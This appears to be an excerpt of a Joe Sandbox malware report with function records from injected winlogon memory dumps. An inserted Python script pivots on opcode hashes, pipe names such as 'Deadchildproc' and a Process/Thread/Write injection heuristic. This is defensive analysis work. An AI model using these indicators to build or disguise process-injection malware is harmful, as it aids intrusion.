                                                         • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmp
                                                         • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                        • String ID: CorExitProcess$mscoree.dll
                                                        • API String ID: 4061214504-1276376045
                                                        • Opcode ID: e9186c1451144fd021b714c5c272bd718a2131959171b64afe02b1703c1f89a6
                                                        • Instruction ID: 5c98f814b2717666e63fde822be8a9d320cb222d300e0f8fa89a857e9905caf9
                                                        • Opcode Fuzzy Hash: e9186c1451144fd021b714c5c272bd718a2131959171b64afe02b1703c1f89a6
                                                        • Instruction Fuzzy Hash: BAF08269339E50F1FF454FE8E88C3693360EB44F42F689869A50B45565CF38C488D710
                                                        APIs
                                                        • _invalid_parameter_noinfo.LIBCMT ref: 00000225DC6509C2
                                                        • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000225DC65093F,?,?,?,00000225DC64E263), ref: 00000225DC650A80
                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000225DC65093F,?,?,?,00000225DC64E263), ref: 00000225DC650B0A
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                         • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmp
                                                         • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                        • String ID:
                                                        • API String ID: 2210144848-0
                                                        • Opcode ID: 6ea8d1c03a27889c2a76d2fa2108f5730873fa6bd6da2ede6083719aa30d033f
                                                        • Instruction ID: 0f0869d84fd53ab6ea288093c665d748a95b5168c1234e854c3338e1b2f4001a
                                                        • Opcode Fuzzy Hash: 6ea8d1c03a27889c2a76d2fa2108f5730873fa6bd6da2ede6083719aa30d033f
                                                        • Instruction Fuzzy Hash: C981D13AA24E70B9FB509FEDC8983AD27A0F744B9AF64C116DE0A5379ADB35C441C310
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                         • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmp
                                                         • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: 902aea7c29ad1d985186d30b6172ed8f126ccee6087c2613379ee29d3f5c645a
                                                        • Instruction ID: 6a0379e32459e306e126bed0441ef87126868a67170dd25357be7999984931ed
                                                        • Opcode Fuzzy Hash: 902aea7c29ad1d985186d30b6172ed8f126ccee6087c2613379ee29d3f5c645a
                                                        • Instruction Fuzzy Hash: 1661DC3A51DF94D6E760DB99E45831A77E0F388B45F109156EA8E87BA8EB7CC440CF04
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000003.1759673624.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_3_225dc610000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                        • Instruction ID: 718e6fdeed9a9adea99c63c7ba1f7eed387718c4396f80e4f9f43301a54de90c
                                                        • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                        • Instruction Fuzzy Hash: 8011252EA0CE7131F76812ECE45E3A990506F94777F18C224EA7F1B7E69A388C41C200
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                         • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmp
                                                         • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                        • Instruction ID: 5220a858afc79e42da2a67563d9900ef8f3c475e5090a1d32d5d42a008362e73
                                                        • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                        • Instruction Fuzzy Hash: 4111A92EB71E3126F76B1EECD49E36D53416B54376F78C624AE760A3D6CA3888C1C100
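The two `_set_statfp` records directly above are worth a second look: the same Opcode ID (26a546e7…) is reported once from the phase-3 dump based at 00000225DC610000 and once from the phase-2 dump based at 00000225DC640000, in the same process (0000000B, the injected winlogon), with different Instruction IDs. That is the pattern of one piece of code observed at two load addresses, and it is consistent with the Opcode ID hashing opcode bytes only while the Instruction ID also covers operands (an inference from the records, not something the report states). Pivoting on these identifiers by hand across hundreds of records is tedious, so the following script is an added example (not part of the Joe Sandbox report or its IDA plugin) that parses records in the layout shown on this page and answers three practitioner questions: which Opcode IDs recur across dumps, which records carry named-pipe strings, and which records combine Process, Thread and Write API stems. The sample input is constructed by abbreviating four records copied from this page; the record layout (each record opens with an "APIs" header, bullet lines carry the fields) and the Process/Thread/Write heuristic are assumptions of this example.

```python
"""Parse Joe Sandbox IDA-plugin function records and pivot on their identifiers.

Added example; assumes the record layout shown in the report above.
"""
import json
import re
from collections import defaultdict

# Constructed sample: four records abbreviated from the report on this page.
SAMPLE = r"""APIs
• LoadLibraryExW.KERNEL32(?,?,?,00000225DC649AEF), ref: 00000225DC6499B5
• GetProcAddress.KERNEL32(?,?,?,00000225DC649AEF), ref: 00000225DC649A3F
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
Similarity
• API ID: Library$Load$AddressErrorFreeLastProc
• String ID: api-ms-
• Opcode ID: af1dc5fe93b083055cd8c5ce044ece591eb4d9ced34ab9dbf74db6faff57ed03
• Instruction ID: 24c979095fe9684387ee1b36362df099c9b39658b339583492920f750c380cbb
APIs
Memory Dump Source
• Source File: 0000000B.00000003.1759673624.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_3_225dc610000_winlogon.jbxd
Similarity
• API ID: _set_statfp
• String ID:
• Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
• Instruction ID: 718e6fdeed9a9adea99c63c7ba1f7eed387718c4396f80e4f9f43301a54de90c
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
Similarity
• API ID: _set_statfp
• String ID:
• Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
• Instruction ID: 5220a858afc79e42da2a67563d9900ef8f3c475e5090a1d32d5d42a008362e73
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
Similarity
• API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
• String ID: \\.\pipe\Deadchildproc
• Opcode ID: 1005d7d54db17bd1b4de57f7c8175984e9a9ac4fa96f888e605f87ef2211e3c7
• Instruction ID: 92c08f6cc4004cb3f8b5e1b06263060720a831a650563b72dd941ce804ecb253
"""

# "• Api.Module(args), ref: ADDR" and the parenthesis-less "• _func.LIBCMT ref: ADDR" form.
CALL_RE = re.compile(r"^• (\w+)\.(\w+)(?:\((.*)\))?,? ref: ([0-9A-Fa-f]+)$")
SRC_RE = re.compile(r"^• Source File: (\S+), Offset: ([0-9A-Fa-f]+), based on PE: (true|false)$")
KV_RE = re.compile(r"^• ([^:]+): ?(.*)$")
PIPE_PREFIX = "\\\\.\\pipe\\"          # the literal \\.\pipe\ prefix
INJECTION_HINTS = {"Process", "Thread", "Write"}   # heuristic; an assumption of this example


def parse_records(text):
    """Split the text into function records; each record starts at an 'APIs' header."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = {"calls": []}
            records.append(cur)
            continue
        if cur is None or not line.startswith("•"):
            continue                     # section headers such as 'Strings', 'Similarity'
        m = CALL_RE.match(line)
        if m:
            cur["calls"].append({"api": m.group(1), "module": m.group(2), "ref": int(m.group(4), 16)})
            continue
        m = SRC_RE.match(line)
        if m:
            dump, base, _ = m.groups()
            cur["dump"] = dump
            cur["pid"] = int(dump.split(".")[0], 16)   # first dotted field is the PID
            cur["base"] = int(base, 16)
            continue
        m = KV_RE.match(line)
        if m:
            cur[m.group(1).strip()] = m.group(2).strip()
    return records


def api_tokens(api_id):
    """Split an API ID such as 'File$Process$CloseCreateThreadWrite' into its word stems."""
    return set(re.findall(r"[A-Z][a-z]*|_[a-z_]+", api_id))


def group_by_opcode(records):
    """Opcode IDs seen in more than one record: the same code at more than one address or dump."""
    groups = defaultdict(list)
    for r in records:
        if "Opcode ID" in r:
            groups[r["Opcode ID"]].append(r)
    return {k: v for k, v in groups.items() if len(v) > 1}


def find_pipe_names(records):
    """String IDs that are named-pipe paths."""
    return sorted(r["String ID"] for r in records if r.get("String ID", "").startswith(PIPE_PREFIX))


def flag_process_thread_write(records):
    """Records whose API stems include Process, Thread and Write together (heuristic)."""
    return [r for r in records if INJECTION_HINTS <= api_tokens(r.get("API ID", ""))]


def summarize(text):
    recs = parse_records(text)
    return {
        "functions": len(recs),
        "shared_opcode_ids": {k: sorted(hex(r["base"]) for r in v) for k, v in group_by_opcode(recs).items()},
        "pipe_names": find_pipe_names(recs),
        "process_thread_write": [r["Opcode ID"] for r in flag_process_thread_write(recs)],
    }


if __name__ == "__main__":
    print(json.dumps(summarize(SAMPLE), indent=2))
```

Run against a full report export, the `shared_opcode_ids` map lists every function that survives a move between dumps, which is a quick way to confirm that the phase-3 region at 00000225DC610000 and the final region at 00000225DC640000 hold the same code rather than two unrelated payloads; the PID parsed from the dump name (0x0B, 11) should agree with the `hcaresult_11_…` snapshot name, and it does here.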
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                        • String ID: pid_
                                                        • API String ID: 517849248-4147670505
                                                        • Opcode ID: c190cf9c84f4fec237682ecde889163a3056c2ee0c0182666c83aa3720f1176d
                                                        • Instruction ID: c22a7db00d253f58136d9d1775b3b373fcc1f728726c29ad747a4587487ee6a6
                                                        • Opcode Fuzzy Hash: c190cf9c84f4fec237682ecde889163a3056c2ee0c0182666c83aa3720f1176d
                                                        • Instruction Fuzzy Hash: D411811931CF6571EB10DBA9E80935A73A1F784B92F508071DE5AC3B95EF39C905C740
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Free
                                                        • String ID:
                                                        • API String ID: 3168794593-0
                                                        • Opcode ID: 675c280ff13286ce7d146578b7a03c3a8db6339f083b3ff198ff4cd99f23170e
                                                        • Instruction ID: bd53f42dd907213fd0dbf636d3fa9370317a7402f99812b588ab86bc55ced33c
                                                        • Opcode Fuzzy Hash: 675c280ff13286ce7d146578b7a03c3a8db6339f083b3ff198ff4cd99f23170e
                                                        • Instruction Fuzzy Hash: FA010876624FA0D6E714DFBAE80815977A1F788F85F188835EA4A53728DF38C455CB40
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3081899298-91387939
                                                        • Opcode ID: 64816e4cd3ccee350da6ce7bbddcd7399f42add8e1b6bc9b0cc6ea827a19452e
                                                        • Instruction ID: e539cc0db90e06d70ee35d471f3c7cda66ac8f9e6424b185eea5754c5d75979f
                                                        • Opcode Fuzzy Hash: 64816e4cd3ccee350da6ce7bbddcd7399f42add8e1b6bc9b0cc6ea827a19452e
                                                        • Instruction Fuzzy Hash: 9B71C43A20CBA199E766DFEE98483AE77A5F385B86F548065DE0B43B98DF34C505C700
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000003.1759673624.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_3_225dc610000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID: HIJKLMNOPQRSTUVWXYZ$bad array new length
                                                        • API String ID: 3215553584-4137334423
                                                        • Opcode ID: f0e5866417592c2ff8c3377a202dd0391a84e675177e715dfbe21364aa16f179
                                                        • Instruction ID: 8fb73bca81c6f3bbd4f8502082ab705956e6a2f232d73ed21a21482d56adcd0a
                                                        • Opcode Fuzzy Hash: f0e5866417592c2ff8c3377a202dd0391a84e675177e715dfbe21364aa16f179
                                                        • Instruction Fuzzy Hash: 6761C139E06EB0B2FEAA9BDC914C36D67A4F742793F10C525DB1A077A5DA38C841C200
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3081899298-91387939
                                                        • Opcode ID: 15f2f4e0f9d638f158a96525c1ecafbceb1b9e2c8075581ad63209208a78af1e
                                                        • Instruction ID: 283e452f4dc49e6172955ca571761fce7bd5812099730cfdc5521d6b923f821b
                                                        • Opcode Fuzzy Hash: 15f2f4e0f9d638f158a96525c1ecafbceb1b9e2c8075581ad63209208a78af1e
                                                        • Instruction Fuzzy Hash: 6851182A20CBA5A1E67ADFEDA06C3BA7761F385782F658065DF4B43B49DA39C404C740
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: ErrorFileLastWrite
                                                        • String ID: U
                                                        • API String ID: 442123175-4171548499
                                                        • Opcode ID: f44db66318a18b3e6bf0bbc027b995569a44fb504c85fb8b49b9fe2e6159cddc
                                                        • Instruction ID: bb11c882aadb6327b1bdfe44d72d638a204d06c6a5b0cbe3b30abc1ba246ec35
                                                        • Opcode Fuzzy Hash: f44db66318a18b3e6bf0bbc027b995569a44fb504c85fb8b49b9fe2e6159cddc
                                                        • Instruction Fuzzy Hash: DE411A36324F50A5EB20DFA9E8487AA77A0F788B85F518021EE4D87788DF3CC445CB40
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Stringtry_get_function
                                                        • String ID: LCMapStringEx
                                                        • API String ID: 2588686239-3893581201
                                                        • Opcode ID: 9eb651065806efa1f3c1ddeda68a4214a605e5c82d734f3d398dbc25806cdd5e
                                                        • Instruction ID: 427020b376e4c09a5661ea75c9ab15ac7223fe4e67b4b0c5e56b97b635498bde
                                                        • Opcode Fuzzy Hash: 9eb651065806efa1f3c1ddeda68a4214a605e5c82d734f3d398dbc25806cdd5e
                                                        • Instruction Fuzzy Hash: 2F111A3A608B9096D760CB5AF4842AAB7A5F7C9B85F548126EE8D83B59CF38C550CB00
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFileHeaderRaise
                                                        • String ID: csm
                                                        • API String ID: 2573137834-1018135373
                                                        • Opcode ID: ba97a2cfb4494a9593318773eec94a3c4e74a75ef8f777109a467670aa1db902
                                                        • Instruction ID: 960868f448a03db2c21822a72a1f7356bddc94f91c19fb373935763ee4a634d0
                                                        • Opcode Fuzzy Hash: ba97a2cfb4494a9593318773eec94a3c4e74a75ef8f777109a467670aa1db902
                                                        • Instruction Fuzzy Hash: 4A11283A218B9092EB218F69F444259B7A4F788F95F588260EE8D07B69DF38C552CB00
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                        • String ID: InitializeCriticalSectionEx
                                                        • API String ID: 539475747-3084827643
                                                        • Opcode ID: e64e4740045ae81cdb2e514f923c51f250565fc9a097f0243aa16987f787090b
                                                        • Instruction ID: b3f187545fe17d623a24baa53dc8594969e2c9e7263f256d5a5530cdc78f252b
                                                        • Opcode Fuzzy Hash: e64e4740045ae81cdb2e514f923c51f250565fc9a097f0243aa16987f787090b
                                                        • Instruction Fuzzy Hash: B6F0A72D728FA0E1EB059BD9F4486A93271FB48F92F64C5A5EA0A03B94CF38C945C740
                                                        APIs
                                                        • try_get_function.LIBVCRUNTIME ref: 00000225DC64D751
                                                        • TlsSetValue.KERNEL32(?,?,?,00000225DC64B50E,?,?,?,00000225DC64B969,?,?,?,?,00000225DC64BA1D), ref: 00000225DC64D768
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Valuetry_get_function
                                                        • String ID: FlsSetValue
                                                        • API String ID: 738293619-3750699315
                                                        • Opcode ID: fc325339b7f97732f837055afb4aa1383e496b4c3619d26f7748048e5b1acc4f
                                                        • Instruction ID: 642fbd2dda96894f580812c56a5652b05d9000be71fdb728acab7feffa0d9173
                                                        • Opcode Fuzzy Hash: fc325339b7f97732f837055afb4aa1383e496b4c3619d26f7748048e5b1acc4f
                                                        • Instruction Fuzzy Hash: 2CE09B69618E50F1EA454BDCF4482EC3262FB48B82F68D165E506073D4DE38C845C700
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID:
                                                        • API String ID: 756756679-0
                                                        • Opcode ID: 25d11f289d9fbfcfef02ead22fd34e1bae26a1daa0a4a5c4d43c16fe266dba3e
                                                        • Instruction ID: 556b476d0f33124e422c36ad8569c178eac90306c37eaa587df2c31a934b8e95
                                                        • Opcode Fuzzy Hash: 25d11f289d9fbfcfef02ead22fd34e1bae26a1daa0a4a5c4d43c16fe266dba3e
                                                        • Instruction Fuzzy Hash: A411E915A18FA091EA15CBBAA808159B7E0FB88FA1F598324DF59537A4EF3CC042C700
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1617791916-0
                                                        • Opcode ID: f083a3077c0b1c945921efc18f57caeeb55b99edd70e436b0099e2dca6254ff4
                                                        • Instruction ID: 7f09943860e580462c33847df39b632ff2cb192837c8874d12c54d09fda5f2e5
                                                        • Opcode Fuzzy Hash: f083a3077c0b1c945921efc18f57caeeb55b99edd70e436b0099e2dca6254ff4
